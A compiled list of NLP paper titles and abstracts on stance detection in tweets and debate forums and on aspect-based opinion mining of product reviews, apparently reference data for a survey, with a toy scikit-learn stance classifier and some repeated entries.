Embeddings and CNN-based Sequence Labeling for Aspect Extraction paper_content: One key task of fine-grained sentiment analysis of product reviews is to extract product aspects or features that users have expressed opinions on. This paper focuses on supervised aspect extraction using deep learning. Unlike other highly sophisticated supervised deep learning models, this paper proposes a novel and yet simple CNN model employing two types of pre-trained embeddings for aspect extraction: general-purpose embeddings and domain-specific embeddings. Without using any additional supervision, this model achieves surprisingly good results, outperforming state-of-the-art sophisticated existing methods. To our knowledge, this paper is the first to report such double embeddings based CNN model for aspect extraction and achieve very good results. --- paper_title: Stance and Sentiment in Tweets paper_content: We can often detect from a person's utterances whether he/she is in favor of or against a given target entity -- their stance towards the target. However, a person may express the same stance towards a target by using negative or positive language. Here for the first time we present a dataset of tweet--target pairs annotated for both stance and sentiment. The targets may or may not be referred to in the tweets, and they may or may not be the target of opinion in the tweets. Partitions of this dataset were used as training and test sets in a SemEval-2016 shared task competition. We propose a simple stance detection system that outperforms submissions from all 19 teams that participated in the shared task. Additionally, access to both stance and sentiment annotations allows us to explore several research questions. We show that while knowing the sentiment expressed by a tweet is beneficial for stance classification, it alone is not sufficient. 
Finally, we use additional unlabeled data through distant supervision techniques and word embeddings to further improve stance classification. --- paper_title: Extracting Product Features And Opinions From Reviews paper_content: Consumers are often forced to wade through many on-line reviews in order to make an informed product choice. This paper introduces Opine, an unsupervised information-extraction system which mines reviews in order to build a model of important product features, their evaluation by reviewers, and their relative quality across products. Compared to previous work, Opine achieves 22% higher precision (with only 3% lower recall) on the feature extraction task. Opine's novel use of relaxation labeling for finding the semantic orientation of words in context leads to strong performance on the tasks of finding opinion phrases and their polarity. --- paper_title: Ideological Perspective Detection Using Semantic Features paper_content: In this paper, we propose the use of word sense disambiguation and latent semantic features to automatically identify a person's perspective from his/her written text. We run an Amazon Mechanical Turk experiment where we ask Turkers to answer a set of constrained and open-ended political questions drawn from the American National Election Studies (ANES). We then extract the proposed features from the answers to the open-ended questions and use them to predict the answer to one of the constrained questions, namely, their preferred Presidential Candidate. In addition to this newly created dataset, we also evaluate our proposed approach on a second standard dataset of "Ideological-Debates". This latter dataset contains topics from four domains: Abortion, Creationism, Gun Rights and Gay Rights. Experimental results show that using word sense disambiguation and latent semantics, whether separately or combined, beats the majority and random baselines on the cross-validation and held-out test sets for both the ANES and the four domains of the "Ideological Debates" datasets. Moreover, combining both feature sets outperforms a stronger unigram-only classification system. --- paper_title: The Berkeley FrameNet Project paper_content: FrameNet is a three-year NSF-supported project in corpus-based computational lexicography, now in its second year (NSF IRI-9618838, "Tools for Lexicon Building"). The project's key features are (a) a commitment to corpus evidence for semantic and syntactic generalizations, and (b) the representation of the valences of its target words (mostly nouns, adjectives, and verbs) in which the semantic portion makes use of frame semantics. The resulting database will contain (a) descriptions of the semantic frames underlying the meanings of the words described, and (b) the valence representation (semantic and syntactic) of several thousand words and phrases, each accompanied by (c) a representative collection of annotated corpus attestations, which jointly exemplify the observed linkings between "frame elements" and their syntactic realizations (e.g. grammatical function, phrase type, and other syntactic traits). This report will present the project's goals and workflow, and information about the computational tools that have been adapted or created in-house for this work. --- paper_title: Frame Semantics for Stance Classification paper_content: Determining the stance expressed by an author from a post written for a two-sided debate in an online debate forum is a relatively new problem in opinion mining.
We extend a state-of-the-art learning-based approach to debate stance classification by (1) inducing lexico-syntactic patterns based on syntactic dependencies and semantic frames that aim to capture the meaning of a sentence and provide a generalized representation of it; and (2) improving the classification of a test post via a novel way of exploiting the information in other test posts with the same stance. Empirical results on four datasets demonstrate the effectiveness of our extensions. --- paper_title: Stance Mining for Online Debate Posts Using Part-of-Speech (POS) Tags Frequency paper_content: Online social media generate immense amounts of data day after day, as online users connect with each other, build their communities, share their attitudes and publish their opinions. The users have become an important source of content. One of the most popular social media platforms is the online debate forum, which allows users to express their attitudes and feelings towards different issues. Debate posts use informal language and non-standard expressions, and many spelling errors occur due to the absence of correctness verification. Our goal is to apply stance mining in the public arena to automatically collect users' attitudes from political debate forums, where opinions towards public issues can help government or political organizations make decisions. This paper presents linguistic features that combine part-of-speech (POS) tagging features with tf-idf weights, which differ from the ordinary features used in stance classification, and obtains good accuracy. --- paper_title: Cats Rule and Dogs Drool!: Classifying Stance in Online Debate paper_content: A growing body of work has highlighted the challenges of identifying the stance a speaker holds towards a particular topic, a task that involves identifying a holistic subjective disposition. We examine stance classification on a corpus of 4873 posts across 14 topics on ConvinceMe.net, ranging from the playful to the ideological. We show that ideological debates feature a greater share of rebuttal posts, and that rebuttal posts are significantly harder to classify for stance, for both humans and trained classifiers. We also demonstrate that the number of subjective expressions varies across debates, a fact correlated with the performance of systems sensitive to sentiment-bearing terms. We present results for identifying rebuttals with 63% accuracy, and for identifying stance on a per-topic basis that ranges from 54% to 69%, as compared to unigram baselines that vary between 49% and 60%. Our results suggest that methods that take into account the dialogic context of such posts might be fruitful. --- paper_title: Unsupervised stance classification in online debates paper_content: This paper proposes an unsupervised debate stance classification algorithm, in other words, finding the side a post author is taking in an online debate. Stance detection has a complementary role in information retrieval, opinion mining, text summarization, etc. Existing stance detection techniques are not able to effectively handle two challenges: determining whether a given post is a debate post or not, and, if the post is a debate on a given topic, correctly classifying the side that the post author is taking. In this paper, we propose techniques that address both of the above issues. Compared to existing techniques, our technique gives a 30% improvement in detection of whether a post is a debate or not.
Our technique is able to find the side that an author is taking in a debate by 10% higher F1 score compared to existing work. We achieve this improvement by using new syntactic rules, better aspect popularity detection, co-reference resolution, and a novel integer linear programming model to solve the problem. --- paper_title: Generating Typed Dependency Parses from Phrase Structure Parses paper_content: This paper describes a system for extracting typed dependency parses of English sentences from phrase structure parses. In order to capture inherent relations occurring in corpus texts that can be critical in real-world applications, many NP relations are included in the set of grammatical relations used. We provide a comparison of our system with Minipar and the Link parser. The typed dependency extraction facility described here is integrated in the Stanford Parser, available for download. --- paper_title: Joint Models of Disagreement and Stance in Online Debate paper_content: Online debate forums present a valuable opportunity for the understanding and modeling of dialogue. To understand these debates, a key challenge is inferring the stances of the participants, all of which are interrelated and dependent. While collectively modeling users’ stances has been shown to be effective (Walker et al., 2012c; Hasan and Ng, 2013), there are many modeling decisions whose ramifications are not well understood. To investigate these choices and their effects, we introduce a scalable unified probabilistic modeling framework for stance classification models that 1) are collective, 2) reason about disagreement, and 3) can model stance at either the author level or at the post level. We comprehensively evaluate the possible modeling choices on eight topics across two online debate corpora, finding accuracy improvements of up to 11.5 percentage points over a local classifier. Our results highlight the importance of making the correct modeling choices for online dialogues, and having a unified probabilistic modeling framework that makes this possible. --- paper_title: Stance Classification of Ideological Debates: Data, Models, Features, and Constraints paper_content: Determining the stance expressed in a post written for a two-sided debate in an online debate forum is a relatively new and challenging problem in opinion mining. We seek to gain a better understanding of how to improve machine learning approaches to stance classification of ideological debates, specifically by examining how the performance of a learning-based stance classification system varies with the amount and quality of the training data, the complexity of the underlying model, the richness of the feature set, as well as the application of extra-linguistic constraints. --- paper_title: Stance Classification using Dialogic Properties of Persuasion paper_content: Public debate functions as a forum for both expressing and forming opinions, an important aspect of public life. We present results for automatically classifying posts in online debate as to the position, or stance that the speaker takes on an issue, such as Pro or Con. We show that representing the dialogic structure of the debates in terms of agreement relations between speakers, greatly improves performance for stance classification, over models that operate on post content and parent-post context alone. 
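Many of the debate-stance systems surveyed above start from a feature-based supervised classifier over post text. The sketch below shows that kind of baseline in scikit-learn, with made-up posts, stance labels, and hyper-parameters; it stands in for the general learning-based approach rather than any particular cited system.

```python
# Toy sketch of a feature-based stance classifier for debate posts:
# n-gram tf-idf features plus a linear SVM. All posts, labels, and
# hyper-parameters are illustrative assumptions only.
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import LinearSVC

posts = [
    "Gun control saves lives and should be expanded",
    "The second amendment protects our right to bear arms",
    "Stricter background checks are common sense",
    "More laws will not stop criminals from getting guns",
]
stances = ["PRO", "CON", "PRO", "CON"]   # stance towards a hypothetical "gun control" topic

clf = Pipeline([
    ("tfidf", TfidfVectorizer(ngram_range=(1, 2), lowercase=True)),
    ("svm", LinearSVC(C=1.0)),
])
clf.fit(posts, stances)

print(clf.predict(["Background checks are a sensible safeguard"]))
```

The collective and dialogic models described above then add structure on top of such local classifiers, for example by propagating agreement or rebuttal relations between posts and authors.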
--- paper_title: Modeling User Arguments, Interactions, and Attributes for Stance Prediction in Online Debate Forums paper_content: Online debate forums are important social media for people to voice their opinions and debate with each other. Mining user stances or viewpoints from these forums has been a popular research topic. However, most current work does not address an important problem: for a specific issue, there may not be many users participating and expressing their opinions. Despite the sparsity of user stances, users may provide rich side information; for example, users may write arguments to back up their stances, interact with each other, and provide biographical information. In this work, we propose an integrated model to leverage side information. Our proposed method is a regression-based latent factor model which jointly models user arguments, interactions, and attributes. Our method can perform stance prediction for both warm-start and cold-start users. We demonstrate in experiments that our method has promising results on both micro-level and macro-level stance prediction. --- paper_title: Collective Stance Classification of Posts in Online Debate Forums paper_content: Online debate sites are a large source of informal and opinion-sharing dialogue on current socio-political issues. Inferring users’ stance (PRO or CON) towards discussion topics in domains such as politics or news is an important problem, and is of utility to researchers, government organizations, and companies. Predicting users’ stance supports identification of social and political groups, building of better recommender systems, and personalization of users’ information preferences to their ideological beliefs. In this paper, we develop a novel collective classification approach to stance classification, which makes use of both structural and linguistic features, and which collectively labels the posts’ stance across a network of the users’ posts. We identify both linguistic features of the posts and features that capture the underlying relationships between posts and users. We use probabilistic soft logic (PSL) (Bach et al., 2013) to model post stance by leveraging both these local linguistic features as well as the observed network structure of the posts to reason over the dataset. We evaluate our approach on 4FORUMS (Walker et al., 2012b), a collection of discussions from an online debate site on issues ranging from gun control to gay marriage. We show that our collective classification model is able to easily incorporate rich, relational information and outperforms a local model which uses only linguistic information. --- paper_title: A Short Introduction to Probabilistic Soft Logic paper_content: Probabilistic soft logic (PSL) is a framework for collective, probabilistic reasoning in relational domains. PSL uses first order logic rules as a template language for graphical models over random variables with soft truth values from the interval [0, 1]. Inference in this setting is a continuous optimization task, which can be solved efficiently. This paper provides an overview of the PSL language and its techniques for inference and weight learning. An implementation of PSL is available at http://psl.umiacs.umd.edu/. --- paper_title: JU_NLP at SemEval-2016 Task 6: Detecting Stance in Tweets using Support Vector Machines paper_content: We describe the system submitted to the SemEval-2016 for detecting stance in tweets (Task 6, Subtask A). 
One of the main goals of stance detection is to automatically determine the stance of a tweet towards a specific target as ‘FAVOR’, ‘AGAINST’, or ‘NONE’. We developed a supervised system using Support Vector Machines to identify the stance by analyzing various lexical and semantic features. The average F1 score achieved by our system is 60.60. --- paper_title: DeepStance at SemEval-2016 Task 6: Detecting Stance in Tweets Using Character and Word-Level CNNs paper_content: This paper describes our approach for the Detecting Stance in Tweets task (SemEval-2016 Task 6). We utilized recent advances in short text categorization using deep learning to create word-level and character-level models. The choice between word-level and character-level models in each particular case was informed through validation performance. Our final system is a combination of classifiers using word-level or character-level models. We also employed novel data augmentation techniques to expand and diversify our training dataset, thus making our system more robust. Our system achieved a macro-average precision, recall and F1-scores of 0.67, 0.61 and 0.635 respectively. --- paper_title: Recurrent neural network based language model paper_content: A new recurrent neural network based language model (RNN LM) with applications to speech recognition is presented. Results indicate that it is possible to obtain around 50% reduction of perplexity by using mixture of several RNN LMs, compared to a state of the art backoff language model. Speech recognition experiments show around 18% reduction of word error rate on the Wall Street Journal task when comparing models trained on the same amount of data, and around 5% on the much harder NIST RT05 task, even when the backoff model is trained on much more data than the RNN LM. We provide ample empirical evidence to suggest that connectionist language models are superior to standard n-gram techniques, except their high computational (training) complexity. Index Terms: language modeling, recurrent neural networks, speech recognition --- paper_title: MITRE at SemEval-2016 Task 6: Transfer Learning for Stance Detection paper_content: We describe MITRE's submission to the SemEval-2016 Task 6, Detecting Stance in Tweets. This effort achieved the top score in Task A on supervised stance detection, producing an average F1 score of 67.8 when assessing whether a tweet author was in favor or against a topic. We employed a recurrent neural network initialized with features learned via distant supervision on two large unlabeled datasets. We trained embeddings of words and phrases with the word2vec skip-gram method, then used those features to learn sentence representations via a hashtag prediction auxiliary task. These sentence vectors were then fine-tuned for stance detection on several hundred labeled examples. The result was a high performing system that used transfer learning to maximize the value of the available training data. --- paper_title: A Convolutional Neural Network for Modelling Sentences paper_content: The ability to accurately represent sentences is central to language understanding. We describe a convolutional architecture dubbed the Dynamic Convolutional Neural Network (DCNN) that we adopt for the semantic modelling of sentences. The network uses Dynamic k-Max Pooling, a global pooling operation over linear sequences. 
The network handles input sentences of varying length and induces a feature graph over the sentence that is capable of explicitly capturing short and long-range relations. The network does not rely on a parse tree and is easily applicable to any language. We test the DCNN in four experiments: small scale binary and multi-class sentiment prediction, six-way question classification and Twitter sentiment prediction by distant supervision. The network achieves excellent performance in the first three tasks and a greater than 25% error reduction in the last task with respect to the strongest baseline. --- paper_title: pkudblab at SemEval-2016 Task 6 : A Specific Convolutional Neural Network System for Effective Stance Detection paper_content: In this paper, we develop a convolutional neural network for stance detection in tweets. According to the official results, our system ranks 1 on subtask B (among 9 teams) and ranks 2 on subtask A (among 19 teams) on the twitter test set of SemEval2016 Task 6. The main contribution of our work is as follows. We design a ”vote scheme” for prediction instead of predicting when the accuracy of validation set reaches its maximum. Besides, we make some improvement on the specific subtasks. For subtask A, we separate datasets into five sub-datasets according to their targets, and train and test five separate models. For subtask B, we establish a two-class training dataset from the official domain corpus, and then modify the softmax layer to perform three-class classification. Our system can be easily re-implemented and optimized for other related tasks. --- paper_title: Twitter Stance Detection — A Subjectivity and Sentiment Polarity Inspired Two-Phase Approach paper_content: The problem of stance detection from Twitter tweets, has recently gained significant research attention. This paper addresses the problem of detecting the stance of given tweets, with respect to given topics, from user-generated text (tweets). We use the SemEval 2016 stance detection task dataset. The labels comprise of positive, negative and neutral stances, with respect to given topics. We develop a two-phase feature-driven model. First, the tweets are classified as neutral vs. non-neutral. Next, non-neutral tweets are classified as positive vs. negative. The first phase of our work draws inspiration from the subjectivity classification and the second phase from the sentiment classification literature. We propose the use of two novel features, which along with our streamlined approach, plays a key role deriving the strong results that we obtain. We use traditional support vector machine (SVM) based machine learning. Our system (F-score: 74.44 for SemEval 2016 Task A and 61.57 for Task B) significantly outperforms the state of the art (F-score: 68.98 for Task A and 56.28 for Task B). While the performance of the system on Task A shows the effectiveness of our model for targets on which the model was trained upon, the performance of the system on Task B shows the generalization that our model achieves. The stance detection problem in Twitter is applicable for user opinion mining related applications and other social influence and information flow modeling applications, in real life. --- paper_title: Multi-Target Stance Detection via a Dynamic Memory-Augmented Network paper_content: Stance detection aims at inferring from text whether the author is in favor of, against, or neutral towards a target entity. Most of the existing studies consider different target entities separately. 
However, in many scenarios, stance targets are closely related, such as several candidates in a general election and different brands of the same product. Multi-target stance detection, in contrast, aims at jointly detecting stances towards multiple related targets. As stance expression regarding a target can provide additional information to help identify the stances towards other related targets, modeling expressions regarding multiple targets jointly is beneficial for improving the overall performance compared to a single-target scheme. In this paper, we propose a dynamic memory-augmented network (DMAN) for multi-target stance detection. DMAN utilizes a shared external memory, which is dynamically updated through the learning process, to capture and store stance-indicative information for multiple related targets. It then jointly predicts stances towards these targets in a multitask manner. Experimental results show the effectiveness of our DMAN model. --- paper_title: A Target-Guided Neural Memory Model for Stance Detection in Twitter paper_content: Exploring user stances and attitudes is beneficial to a number of Web-related research and applications, especially in social media platforms such as Twitter. Stance detection in Twitter aims at identifying the stance expressed in a tweet towards a given target (e.g., a government policy). A key challenge of this task is that a tweet may not explicitly express opinion about the target. To effectively detect user stances implied in tweets, target content information plays an important role. In previous studies, conventional feature-based methods often ignore target content. Although more recent neural network-based methods attempt to integrate target information using attention mechanisms, the performance improvement is rather limited due to the underuse of this information. To address this issue, we propose an end-to-end neural model, TGMN-CR, which makes better use of target content information. Specifically, our model first learns a conditional tweet representation with respect to a specific target. It then employs a target-guided iterative process to extract crucial stance-indicative clues via multiple interactions between target and tweet words. Experimental results on the SemEval-2016 Task 6.A Twitter Stance Detection dataset show that our proposed method outperforms the state-of-the-art alternative methods, and substantially outperforms the comparative methods when a tweet does not explicitly express opinion about the given target. --- paper_title: Connecting Targets to Tweets: Semantic Attention-Based Model for Target-Specific Stance Detection paper_content: Understanding what people say and really mean in tweets is still a wide open research question. In particular, understanding the stance of a tweet, which is determined not only by its content, but also by the given target, is a very recent research aim of the community. It still remains a challenge to construct a tweet's vector representation with respect to the target, especially when the target is only implicitly mentioned, or not mentioned at all in the tweet. We believe that better performance can be obtained by incorporating the information of the target into the tweet's vector representation. In this paper, we thus propose to embed a novel attention mechanism at the semantic level in the bi-directional GRU-CNN structure, which is more fine-grained than the existing token-level attention mechanism.
This novel attention mechanism allows the model to automatically attend to useful semantic features of informative tokens in deciding the target-specific stance, which further results in a conditional vector representation of the tweet, with respect to the given target. We evaluate our proposed model on a recent, widely applied benchmark Stance Detection dataset from Twitter for the SemEval-2016 Task 6.A. Experimental results demonstrate that the proposed model substantially outperforms several strong baselines, which include the state-of-the-art token-level attention mechanism on bi-directional GRU outputs and the SVM classifier. --- paper_title: MITRE at SemEval-2016 Task 6: Transfer Learning for Stance Detection paper_content: We describe MITRE's submission to the SemEval-2016 Task 6, Detecting Stance in Tweets. This effort achieved the top score in Task A on supervised stance detection, producing an average F1 score of 67.8 when assessing whether a tweet author was in favor or against a topic. We employed a recurrent neural network initialized with features learned via distant supervision on two large unlabeled datasets. We trained embeddings of words and phrases with the word2vec skip-gram method, then used those features to learn sentence representations via a hashtag prediction auxiliary task. These sentence vectors were then fine-tuned for stance detection on several hundred labeled examples. The result was a high performing system that used transfer learning to maximize the value of the available training data. --- paper_title: pkudblab at SemEval-2016 Task 6 : A Specific Convolutional Neural Network System for Effective Stance Detection paper_content: In this paper, we develop a convolutional neural network for stance detection in tweets. According to the official results, our system ranks 1 on subtask B (among 9 teams) and ranks 2 on subtask A (among 19 teams) on the twitter test set of SemEval2016 Task 6. The main contribution of our work is as follows. We design a ”vote scheme” for prediction instead of predicting when the accuracy of validation set reaches its maximum. Besides, we make some improvement on the specific subtasks. For subtask A, we separate datasets into five sub-datasets according to their targets, and train and test five separate models. For subtask B, we establish a two-class training dataset from the official domain corpus, and then modify the softmax layer to perform three-class classification. Our system can be easily re-implemented and optimized for other related tasks. --- paper_title: Twitter Stance Detection — A Subjectivity and Sentiment Polarity Inspired Two-Phase Approach paper_content: The problem of stance detection from Twitter tweets, has recently gained significant research attention. This paper addresses the problem of detecting the stance of given tweets, with respect to given topics, from user-generated text (tweets). We use the SemEval 2016 stance detection task dataset. The labels comprise of positive, negative and neutral stances, with respect to given topics. We develop a two-phase feature-driven model. First, the tweets are classified as neutral vs. non-neutral. Next, non-neutral tweets are classified as positive vs. negative. The first phase of our work draws inspiration from the subjectivity classification and the second phase from the sentiment classification literature. We propose the use of two novel features, which along with our streamlined approach, plays a key role deriving the strong results that we obtain. 
We use traditional support vector machine (SVM) based machine learning. Our system (F-score: 74.44 for SemEval 2016 Task A and 61.57 for Task B) significantly outperforms the state of the art (F-score: 68.98 for Task A and 56.28 for Task B). While the performance of the system on Task A shows the effectiveness of our model for targets on which the model was trained upon, the performance of the system on Task B shows the generalization that our model achieves. The stance detection problem in Twitter is applicable for user opinion mining related applications and other social influence and information flow modeling applications, in real life. --- paper_title: Connecting Targets to Tweets: Semantic Attention-Based Model for Target-Specific Stance Detection paper_content: Understanding what people say and really mean in tweets is still a wide open research question. In particular, understanding the stance of a tweet, which is determined not only by its content, but also by the given target, is a very recent research aim of the community. It still remains a challenge to construct a tweet’s vector representation with respect to the target, especially when the target is only implicitly mentioned, or not mentioned at all in the tweet. We believe that better performance can be obtained by incorporating the information of the target into the tweet’s vector representation. In this paper, we thus propose to embed a novel attention mechanism at the semantic level in the bi-directional GRU-CNN structure, which is more fine-grained than the existing token-level attention mechanism. This novel attention mechanism allows the model to automatically attend to useful semantic features of informative tokens in deciding the target-specific stance, which further results in a conditional vector representation of the tweet, with respect to the given target. We evaluate our proposed model on a recent, widely applied benchmark Stance Detection dataset from Twitter for the SemEval-2016 Task 6.A. Experimental results demonstrate that the proposed model substantially outperforms several strong baselines, which include the state-of-the-art token-level attention mechanism on bi-directional GRU outputs and the SVM classifier. --- paper_title: ILDA: interdependent LDA model for learning latent aspects and their ratings from online product reviews paper_content: Today, more and more product reviews become available on the Internet, e.g., product review forums, discussion groups, and Blogs. However, it is almost impossible for a customer to read all of the different and possibly even contradictory opinions and make an informed decision. Therefore, mining online reviews (opinion mining) has emerged as an interesting new research direction. Extracting aspects and the corresponding ratings is an important challenge in opinion mining. An aspect is an attribute or component of a product, e.g. 'screen' for a digital camera. It is common that reviewers use different words to describe an aspect (e.g. 'LCD', 'display', 'screen'). A rating is an intended interpretation of the user satisfaction in terms of numerical values. Reviewers usually express the rating of an aspect by a set of sentiments, e.g. 'blurry screen'. In this paper we present three probabilistic graphical models which aim to extract aspects and corresponding ratings of products from online reviews. The first two models extend standard PLSI and LDA to generate a rated aspect summary of product reviews. 
As our main contribution, we introduce the Interdependent Latent Dirichlet Allocation (ILDA) model. This model is more natural for our task since the underlying probabilistic assumptions (interdependency between aspects and ratings) are appropriate for our problem domain. We conduct experiments on a real-life dataset, Epinions.com, demonstrating the improved effectiveness of the ILDA model in terms of the likelihood of a held-out test set, and the accuracy of aspects and aspect ratings. --- paper_title: Fine-grained Opinion Mining with Recurrent Neural Networks and Word Embeddings paper_content: The tasks in fine-grained opinion mining can be regarded as either a token-level sequence labeling problem or as a semantic compositional task. We propose a general class of discriminative models based on recurrent neural networks (RNNs) and word embeddings that can be successfully applied to such tasks without any task-specific feature engineering effort. Our experimental results on the task of opinion target identification show that RNNs, without using any hand-crafted features, outperform feature-rich CRF-based models. Our framework is flexible, allows us to incorporate other linguistic features, and achieves results that rival the top performing systems in SemEval-2014. --- paper_title: Aspect Aware Optimized Opinion Analysis of Online Product Reviews paper_content: Nowadays, social media and microblogging sites are the most popular form of communication. The most useful application on these platforms is opinion mining or sentiment classification of the users. In this work, an automated method is proposed to analyze and summarize opinions on a product in a structured, product aspect based manner. The proposed method will help future potential buyers to acquire a complete picture from a comprehensible representation of the reviews, without going through all the reviews manually. --- paper_title: Jointly Modeling Aspects and Opinions with a MaxEnt-LDA Hybrid paper_content: Discovering and summarizing opinions from online reviews is an important and challenging task. A commonly-adopted framework generates structured review summaries with aspects and opinions. Recently topic models have been used to identify meaningful review aspects, but existing topic models do not identify aspect-specific opinion words. In this paper, we propose a MaxEnt-LDA hybrid model to jointly discover both aspects and aspect-specific opinion words. We show that with a relatively small amount of training data, our model can effectively identify aspect and opinion words simultaneously. We also demonstrate the domain adaptability of our model. --- paper_title: Multi-task Coupled Attentions for Category-specific Aspect and Opinion Terms Co-extraction paper_content: In aspect-based sentiment analysis, most existing methods either focus on aspect/opinion terms extraction or aspect terms categorization. However, each task by itself only provides partial information to end users. To generate more detailed and structured opinion analysis, we propose a finer-grained problem, which we call category-specific aspect and opinion terms extraction. This problem involves the identification of aspect and opinion terms within each sentence, as well as the categorization of the identified terms. To this end, we propose an end-to-end multi-task attention model, where each task corresponds to aspect/opinion terms extraction for a specific category.
Our model benefits from exploring the commonalities and relationships among different tasks to address the data sparsity issue. We demonstrate its state-of-the-art performance on three benchmark datasets. --- paper_title: Recursive Neural Conditional Random Fields for Aspect-based Sentiment Analysis paper_content: In aspect-based sentiment analysis, extracting aspect terms along with the opinions being expressed from user-generated content is one of the most important subtasks. Previous studies have shown that exploiting connections between aspect and opinion terms is promising for this task. In this paper, we propose a novel joint model that integrates recursive neural networks and conditional random fields into a unified framework for explicit aspect and opinion terms co-extraction. The proposed model learns high-level discriminative features and doubly propagates information between aspect and opinion terms, simultaneously. Moreover, it is flexible to incorporate hand-crafted features into the proposed model to further boost its information extraction performance. Experimental results on the SemEval Challenge 2014 dataset show the superiority of our proposed model over several baseline methods as well as the winning systems of the challenge. --- paper_title: An Unsupervised Neural Attention Model for Aspect Extraction paper_content: Methods, systems, and computer-readable storage media for receiving a vocabulary, the vocabulary including text data that is provided as at least a portion of raw data, the raw data being provided in a computer-readable file, associating each word in the vocabulary with a feature vector, providing a sentence embedding for each sentence of the vocabulary based on a plurality of feature vectors to provide a plurality of sentence embeddings, providing a reconstructed sentence embedding for each sentence embedding based on a weighted parameter matrix to provide a plurality of reconstructed sentence embeddings, and training the unsupervised neural attention model based on the sentence embeddings and the reconstructed sentence embeddings to provide a trained neural attention model, the trained neural attention model being used to automatically determine aspects from the vocabulary. --- paper_title: Exploiting coherence for the simultaneous discovery of latent facets and associated sentiments paper_content: Facet-based sentiment analysis involves discovering the latent facets, sentiments and their associations. Traditional facet-based sentiment analysis algorithms typically perform the various tasks in sequence, and fail to take advantage of the mutual reinforcement of the tasks. Additionally, inferring sentiment levels typically requires domain knowledge or human intervention. In this paper, we propose a series of probabilistic models that jointly discover latent facets and sentiment topics, and also order the sentiment topics with respect to a multi-point scale, in a language and domain independent manner. This is achieved by simultaneously capturing both short-range syntactic structure and long range semantic dependencies between the sentiment and facet words. The models further incorporate coherence in reviews, where reviewers dwell on one facet or sentiment level before moving on, for more accurate facet and sentiment discovery. For reviews which are supplemented with ratings, our models automatically order the latent sentiment topics, without requiring seed-words or domain-knowledge.
To the best of our knowledge, our work is the first attempt to combine the notions of syntactic and semantic dependencies in the domain of review mining. Further, the concept of facet and sentiment coherence has not been explored earlier either. Extensive experimental results on real world review data show that the proposed models outperform various state of the art baselines for facet-based sentiment analysis. --- paper_title: Multi-facet Rating of Product Reviews paper_content: Online product reviews are becoming increasingly available, and are being used more and more frequently by consumers in order to choose among competing products. Tools that rank competing products in terms of the satisfaction of consumers that have purchased the product before are thus also becoming popular. We tackle the problem of rating (i.e., attributing a numerical score of satisfaction to) consumer reviews based on their textual content. We here focus on multi-facet review rating, i.e., on the case in which the review of a product (e.g., a hotel) must be rated several times, according to several aspects of the product (for a hotel: cleanliness, centrality of location, etc.). We explore several aspects of the problem, with special emphasis on how to generate vectorial representations of the text by means of POS tagging, sentiment analysis, and feature selection for ordinal regression learning. We present the results of experiments conducted on a dataset of more than 15,000 reviews that we have crawled from a popular hotel review site. --- paper_title: OpinionMiner: a novel machine learning system for web opinion mining and extraction paper_content: Merchants selling products on the Web often ask their customers to share their opinions and hands-on experiences on products they have purchased. Unfortunately, reading through all customer reviews is difficult, especially for popular items, where the number of reviews can be up to hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision. The OpinionMiner system designed in this work aims to mine customer reviews of a product and extract highly detailed product entities on which reviewers express their opinions. Opinion expressions are identified and opinion orientations for each recognized product entity are classified as positive or negative. Different from previous approaches that employed rule-based or statistical techniques, we propose a novel machine learning approach built under the framework of lexicalized HMMs. The approach naturally integrates multiple important linguistic features into automatic learning. In this paper, we describe the architecture and main components of the system. The evaluation of the proposed method is presented based on processing the online product reviews from Amazon and other publicly available datasets. --- paper_title: Mining and summarizing customer reviews paper_content: Merchants selling products on the Web often ask their customers to review the products that they have purchased and the associated services. As e-commerce is becoming more and more popular, the number of customer reviews that a product receives grows rapidly. For a popular product, the number of reviews can be in hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision on whether to purchase the product. It also makes it difficult for the manufacturer of the product to keep track and to manage customer opinions.
For the manufacturer, there are additional difficulties because many merchant sites may sell the same product and the manufacturer normally produces many kinds of products. In this research, we aim to mine and to summarize all the customer reviews of a product. This summarization task is different from traditional text summarization because we only mine the features of the product on which the customers have expressed their opinions and whether the opinions are positive or negative. We do not summarize the reviews by selecting a subset or rewrite some of the original sentences from the reviews to capture the main points as in the classic text summarization. Our task is performed in three steps: (1) mining product features that have been commented on by customers; (2) identifying opinion sentences in each review and deciding whether each opinion sentence is positive or negative; (3) summarizing the results. This paper proposes several novel techniques to perform these tasks. Our experimental results using reviews of a number of products sold online demonstrate the effectiveness of the techniques. --- paper_title: Summarizing Opinions: Aspect Extraction Meets Sentiment Prediction and They Are Both Weakly Supervised paper_content: We present a neural framework for opinion summarization from online product reviews which is knowledge-lean and only requires light supervision (e.g., in the form of product domain labels and user-provided ratings). Our method combines two weakly supervised components to identify salient opinions and form extractive summaries from multiple reviews: an aspect extractor trained under a multi-task objective, and a sentiment predictor based on multiple instance learning. We introduce an opinion summarization dataset that includes a training set of product reviews from six diverse domains and human-annotated development and test sets with gold standard aspect annotations, salience labels, and opinion summaries. Automatic evaluation shows significant improvements over baselines, and a large-scale study indicates that our opinion summaries are preferred by human judges according to multiple criteria. --- paper_title: Opinion digger: an unsupervised opinion miner from unstructured product reviews paper_content: Mining customer reviews (opinion mining) has emerged as an interesting new research direction. Most of the reviewing websites such as Epinions.com provide some additional information on top of the review text and overall rating, including a set of predefined aspects and their ratings, and a rating guideline which shows the intended interpretation of the numerical ratings. However, the existing methods have ignored this additional information. We claim that using this information, which is freely available, along with the review text can effectively improve the accuracy of opinion mining. We propose an unsupervised method, called Opinion Digger, which extracts important aspects of a product and determines the overall consumer's satisfaction for each, by estimating a rating in the range from 1 to 5. We demonstrate the improved effectiveness of our methods on a real life dataset that we crawled from Epinions.com. --- paper_title: Generalizing Syntactic Structures for Product Attribute Candidate Extraction paper_content: Noun phrases (NP) in a product review are always considered as the product attribute candidates in previous work. However, this method limits the recall of the product attribute extraction. 
